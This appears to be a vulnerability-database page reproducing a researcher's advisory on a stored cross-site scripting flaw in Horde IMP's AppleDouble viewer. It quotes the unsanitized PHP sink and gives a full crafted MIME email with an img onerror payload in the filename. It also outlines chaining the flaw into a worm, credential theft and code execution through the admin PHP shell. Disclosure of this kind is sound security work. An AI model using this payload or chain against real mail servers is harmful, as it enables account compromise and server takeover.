Lucene search
+L

Horde Groupware Cross Site Scripting

🗓️ 27 Aug 2026 00:00:00Reported by evanType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 7 Views

Stored XSS in Horde Groupware Appledouble viewer via unsanitized MIME filename enabling RCE.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2026-65053
27 Aug 202618:19
circl
cve
CVE
CVE-2026-65053
24 Aug 202614:53
cve
cvelist
Cvelist
CVE-2026-65053 Horde IMP before 7.2.0 Stored Cross-Site Scripting via AppleDouble Viewer Part Name
24 Aug 202614:53
cvelist
debiancve
Debian CVE
CVE-2026-65053
24 Aug 202614:53
debiancve
euvd
EUVD
EUVD-2026-64899
24 Aug 202614:53
euvd
nvd
NVD
CVE-2026-65053
24 Aug 202615:16
nvd
osv
OSV
DEBIAN-CVE-2026-65053
24 Aug 202615:16
osv
ptsecurity
Positive Technologies
PT-2026-80898
24 Aug 202600:00
ptsecurity
nessus
Tenable Nessus
Linux Distros Unpatched Vulnerability : CVE-2026-65053
25 Aug 202600:00
nessus
vulnrichment
Vulnrichment
CVE-2026-65053 Horde IMP before 7.2.0 Stored Cross-Site Scripting via AppleDouble Viewer Part Name
24 Aug 202614:53
vulnrichment
https://blog.evan.lat/posts/CVE-2026-65053/
    
    the blog talks about two vulns that are chainable together. for the sake of
    brevity ill write up on the stored xss one.
    
    in lib/Mime/Status.php, we see a pretty viable xss sink:
    
    $out .= '<tr><td>' . $val . '</td></tr>';
    
    xrefing this we see that most impls are sanitized with the exception of
    lib/Mime/Viewer/Appledouble.php:
    
    $data_name = $this->getConfigParam('imp_contents')->getPartName($data_part);
    // ...
    sprintf(_("This message contains a Macintosh file (named \"%s\")."),
    $data_name)
    
    exploiting this is trivial obviously. we just need to craft an email like
    this:
    
    From: [email protected]
    To: [email protected]
    Subject: mac file
    MIME-Version: 1.0
    Content-Type: multipart/appledouble; boundary="BOUND"
    
    --BOUND
    Content-Type: application/applefile
    Content-Transfer-Encoding: base64
    
    cmVzb3VyY2UtZm9yay1ieXRlcw==
    
    --BOUND
    Content-Type: application/octet-stream; name="<img src=x
    onerror=alert('hi')>"
    Content-Disposition: attachment; filename="<img src=x onerror=alert('hu2')>"
    Content-Transfer-Encoding: base64
    
    ZGF0YS1mb3JrLWJ5dGVz
    
    --BOUND--
    given the nature of this xss it is very much wormable and turns our
    existing arb file read to a half click exploit. obviously we wouldnt really
    want to use a half click primitive just to read files (although grabbing db
    creds is very trivial with these two vulns chained), so naturally we can
    try to achieve rce with this xss worm primitive.
    
    
    to get an rce from this is easy. we can either target an admin or craft an
    xss worm thatll eventually reach an admin. admins can access a PHP shell
    which let us run arbitrary php code, so we can simply use the xss to hit
    the PHP shell at /horde/admin/phpshell.php
    
    
    this constitutes a half click since the user simply needs to click on the
    email to trigger the xss in question. an exp poc is provided in the blog.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2026 00:00Current
4.8Medium risk
Vulners AI Score4.8
CVSS 45.1
CVSS 3.16.1
EPSS0.00246
SSVC
7